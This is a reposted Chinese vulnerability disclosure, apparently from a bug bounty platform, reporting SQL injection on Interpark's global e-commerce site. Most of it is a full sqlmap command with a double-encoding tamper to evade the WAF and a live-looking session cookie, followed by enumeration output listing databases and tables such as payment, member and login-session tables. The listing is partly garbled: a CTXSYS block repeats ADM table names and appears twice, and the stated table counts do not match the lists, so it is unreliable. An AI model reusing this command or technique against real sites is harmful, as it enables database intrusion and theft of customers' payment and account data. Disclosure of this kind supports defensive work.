神刀安全网

漏洞标题: 韩国本土最大电商linterpark全球站/主站存在sql注入/9库/大量表/双编码/有waf/可union

漏洞详情

披露状态:

2016-05-04: 细节已通知厂商并且等待厂商处理中
2016-05-06: 厂商已经确认,细节仅向厂商公开
2016-05-16: 细节向核心白帽子及相关领域专家公开
2016-05-26: 细节向普通白帽子公开
2016-06-05: 细节向实习白帽子公开
2016-06-20: 细节向公众公开

简要描述:

下午提交但是一直没出数据,对流量分析后发现原流量双编码,tamper之后出了数据,韩国人的数据库名不熟悉,没有具体探测数据

详细说明:

python sqlmap.py -u "http://**.**.**.**/product/Api.do?_method=getNewOption&callback=jQuery111106387168327488439_1462148731058&PRD_NO=4020676593&OPT_TP=01&OPT_NM1=%25EC%2584%25A0%25ED%2583%259D1&_=1462148731059" –user-agent "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36" –cookie "wingState=visible; ipzone=HK; city=Central District; CURRENCY=cny; lang=zh_CN; tiemzone=9; _gat=1; IPCODE=003; interparkstamp_global=1308199864190577841264109964981971; LANGUAGE=zh-cn; igfsTodayViewPrdNo=4020676593; igfsTodayViewImg=/goods_image/6/5/9/3/4020676593i.jpg; igfsTodayViewAge=0; JSESSIONID=lQ5uADDlvsvop1Ps44WS73oeA64Aa2wJzaVuUkIhdyMWIr33QJf7GbO15oUWqUfW; _ga=GA1.2.449814888.1462148585" –time-sec=3 –tamper chardoubleencode.py

漏洞证明:

[21:48:42] [DEBUG] performed 0 queries in 0.02 seconds

available databases [9]:

[*] ADM

[*] APEX_030200

[*] CBT

[*] CTXSYS

[*] EXFSYS

[*] MDSYS

[*] SYS

[*] SYSTEM

[*] XDB

[21:48:42] [INFO] fetching tables for databases: 'ADM, APEX_030200, CBT, CTXSYS, EXFSYS, MDSYS, SYS, SYSTEM, XDB'

[21:48:42] [DEBUG] performed 0 queries in 0.12 seconds

Database: EXFSYS

[1 table]

+——————————–+

| RLM$PARSEDCOND |

+——————————–+

Database: XDB

[2 tables]

+——————————–+

| XDB$IMPORT_TT_INFO |

| XDB$XIDX_IMP_T |

+——————————–+

Database: APEX_030200

[3 tables]

+——————————–+

| WWV_FLOW_DUAL100 |

| WWV_FLOW_LOV_TEMP |

| WWV_FLOW_TEMP_TABLE |

+——————————–+

Database: SYSTEM

[4 tables]

+——————————–+

| HELP |

| OL$ |

| OL$HINTS |

| OL$NODES |

+——————————–+

Database: SYS

[26 tables]

+——————————–+

| DUAL |

| AUDIT_ACTIONS |

| DATA_PUMP_XPL_TABLE$ |

| HS$_PARALLEL_METADATA |

| HS_BULKLOAD_VIEW_OBJ |

| HS_PARTITION_COL_NAME |

| HS_PARTITION_COL_TYPE |

| IMPDP_STATS |

| KU$NOEXP_TAB |

| KU$XKTFBUE |

| KU$_DATAPUMP_MASTER_10_1 |

| KU$_DATAPUMP_MASTER_11_1 |

| KU$_DATAPUMP_MASTER_11_1_0_7 |

| KU$_DATAPUMP_MASTER_11_2 |

| KU$_LIST_FILTER_TEMP |

| KU$_LIST_FILTER_TEMP_2 |

| ODCI_PMO_ROWIDS$ |

| ODCI_SECOBJ$ |

| ODCI_WARNINGS$ |

| PLAN_TABLE$ |

| PSTUBTBL |

| STMT_AUDIT_OPTION_MAP |

| SYSTEM_PRIVILEGE_MAP |

| TABLE_PRIVILEGE_MAP |

| WRI$_ADV_ASA_RECO_DATA |

| WRR$_REPLAY_CALL_FILTER |

+——————————–+

Database: MDSYS

[35 tables]

+——————————–+

| NTV2_XML_DATA |

| OGIS_GEOMETRY_COLUMNS |

| OGIS_SPATIAL_REFERENCE_SYSTEMS |

| SDO_COORD_AXES |

| SDO_COORD_AXIS_NAMES |

| SDO_COORD_OPS |

| SDO_COORD_OP_METHODS |

| SDO_COORD_OP_PARAMS |

| SDO_FEATURE_USAGE |

| SDO_PREFERRED_OPS_SYSTEM |

| SDO_PREFERRED_OPS_USER |

| SDO_PRIME_MERIDIANS |

| SDO_PROJECTIONS_OLD_SNAPSHOT |

| SDO_ST_TOLERANCE |

| SDO_TOPO_DATA$ |

| SDO_TOPO_RELATION_DATA |

| SDO_TOPO_TRANSACT_DATA |

| SDO_TXN_IDX_DELETES |

| SDO_TXN_IDX_EXP_UPD_RGN |

| SDO_TXN_IDX_INSERTS |

| SDO_UNITS_OF_MEASURE |

| SDO_XML_SCHEMAS |

| SRSNAMESPACE_TABLE |

+——————————–+

Database: CBT

[5 tables]

+——————————–+

| PLAN_TABLE |

| TEMP_CBT |

| TMP_GLOBAL_LOGIN_CNT_20150226 |

| TMP_GLOBAL_LOGIN_CNT_20150522 |

| TRACE |

+——————————–+

Database: ADM

[166 tables]

+——————————–+

| BANNER_CONTENT |

| BANNER_GROUP_MASTER |

| BANNER_GROUP_MEMBER |

| BANNER_ITEM |

| BANNER_ITEM_HTML |

| BEST_USED_WRITTEN |

| BEST_USED_WRITTEN_ADMIN |

| BOARD |

| BOARD_DTL |

| B_WORK1 |

| B_WORK2 |

| CARD_PAYMENT |

| CARD_PAYMENT_HIS |

| CART |

| CATEGORY_ADDINFO_MGT |

| CBT_CONTB_PROFIT_CODE |

| CBT_TRANS_INFO |

| CLM_REQUEST |

| CLM_REQUESTDTL |

| CODE_DETAIL |

| CODE_MASTER |

| CONTENT_RECOMMEND |

| CONTENT_REPORT |

| COPY_T |

| COUNTRY_MAP |

| COUPON |

| COUPON_CBT_COND |

| COUPON_CBT_PBLCT |

| COUPON_EXCEPT_PRD |

| COUPON_RANDOM |

| D2D_PRODUCT_PARCEL_TAX |

| D2D_WEIGHT_SHIPPING_FEE |

| DELVWH_ORDER |

| DISPLAY_MENU |

| ENTR_ANTI_MEMBER |

| EVENT |

| EVENT_FREECODE |

| EXCHANGE_RATE |

| EX_ORDER_INFO |

| FAQ |

| FAQ_DTL |

| FAVORITE_ENTR |

| FREECODE_EVENT |

| FREEDELV_EXCEPTION |

| IGS_MENU |

| IGS_MENU_AUTH |

| IGS_USER |

| IGS_USER_AUTHORITY |

| IGS_USER_GROUP |

| IGS_USER_GROUP_AUTH |

| ILS_DELVWH_ORDER |

| ILS_DELVWH_ORDERPRD |

| ILS_DELV_INVOICE |

| ILS_ORD_UPDPROC |

| ILS_RTN_PRD |

| INICIS_PAY_INFO |

| INPAK_DLV_INF |

| INQUIRY |

| INQUIRY_REPLY |

| IPP_MALL_INFO |

| IPP_MALL_TRACE |

| IPP_VISIT_DDSUM |

| LANGCODE_TAG |

| LANGCODE_TAG2VALUE |

| LANGCODE_VALUE |

| LOG |

| LOGIN_SESSION |

| MAIL_SEND_HISTORY |

| MD_ORDERDTL_BUYCONFIRM |

| MEMBER_GLOBAL |

| MEMBER_GLOBAL_TEMP |

| MENU |

| MILEAGE_UNAVAILABLE |

| ORDERCLM |

| ORDERCLMDTL |

| ORDERCLMDTL_DISCOUNT |

| ORDERCLMDTL_ENTR |

| ORDERCLMDTL_STATUS_HIS |

| ORDERCLMDTL_STORE |

| ORDERCLM_ACCESS_INFO |

| ORDERCLM_CRTTP_PRCS |

| ORDERCLM_DELV |

| ORDERCLM_DELVAMT |

| ORDERCLM_DELV_COUPON |

| ORDERCLM_DELV_PLACE |

| ORDERCLM_DELV_PLACE_BASIC |

| ORDERCLM_DELV_WEIGHT |

| ORDERCLM_EOD |

| ORDERCLM_EXCEPTION |

| ORDERCLM_MISS_DELV |

| ORDERCLM_PRODUCT_HIS |

| ORDERCLM_STATUS_HIS |

| ORDER_RELEASE_LIMIT |

| ORDPAYMENT_REFUND |

| ORDPAYMENT_REFUND_DTL |

| RESTAPI_MALL_INFO |

| RESTAPI_PRODUCT_SET |

| RESTAPI_WHITE_LIST |

| REVIEW_SCRAP |

| REV_CARD_PAYMENT_DDSUM |

| REV_DELVAMT_DDSUM |

| REV_DIFF_HST |

| REV_DIFF_RSN |

| REV_EXT_DDSUM |

| REV_IPOINT_DDSUM |

| REV_ORDCLMDTL_ORG_SUM |

| REV_ORDCLMDTL_SUM |

| REV_ORDCLM_EXPENSE_SUM |

| REV_ORDPAYMENT_REFUND_SUM |

| REV_PAY_LOG |

| REV_PRCS_HST |

| REV_SETL_DELVAMT_LOG |

| REV_SETL_PRD_LOG_CBT |

| ROULETTE_ACC_HIS |

| ROULETTE_RANK |

| ROULETTE_RANK_TP |

| SERVICE_USED_WRITTEN |

| SERVICE_USED_WRITTEN_DTL |

| TEMP_PRODUCT_KTY2 |

| TENPAY_PAYMENT |

| TENPAY_PAYMENT_AUTH |

| TENPAY_PAYMENT_HIS |

| TMP_CLAIM |

| TMP_T_IP_CITY |

| TMP_T_LOCATION |

| TOAD_PLAN_TABLE |

| TRULY_COMMENT |

| TRUNCATE_TAB_LIST |

| TRY_CBT_TRANS_INFO |

| TRY_ORD |

| TRY_ORDDELV_PLACE |

| TRY_ORDDTL_DISCOUNT |

| TRY_ORD_DELVAMT |

| TRY_ORD_DELV_COUPON |

| TRY_ORD_DTL |

| TRY_PAYMENT |

| TTT |

| T_IP_CITY |

| T_LOCATION |

| USED_WRITTEN_ADDINFO |

| USED_WRITTEN_MEMBER_01 |

| USED_WRITTEN_PRODUCT_01 |

| USED_WRITTEN_REPLY |

| WORK_CALENDAR |

| ZZIM_CNT |

| ZZIM_LIST |

+——————————–+

Database: CTXSYS

[5 tables]

+——————————–+

| DR$NUMBER_SEQUENCE |

| DR$OBJECT_ATTRIBUTE |

| DR$POLICY_TAB |

| TRY_ORD_DELVAMT |

| TRY_ORD_DELV_COUPON |

| TRY_ORD_DTL |

| TRY_PAYMENT |

| TTT |

| T_IP_CITY |

| T_LOCATION |

| USED_WRITTEN_ADDINFO |

| USED_WRITTEN_MEMBER_01 |

| USED_WRITTEN_PRODUCT_01 |

| USED_WRITTEN_REPLY |

| WORK_CALENDAR |

| ZZIM_CNT |

| ZZIM_LIST |

+——————————–+

Database: CTXSYS

[5 tables]

+——————————–+

| DR$NUMBER_SEQUENCE |

| DR$OBJECT_ATTRIBUTE |

| DR$POLICY_TAB |

| DR$THS |

| DR$THS_PHRASE |

+——————————–+

修复方案:

过滤

版权声明:转载请注明来源 hear7v@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 韩国本土最大电商linterpark全球站/主站存在sql注入/9库/大量表/双编码/有waf/可union

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址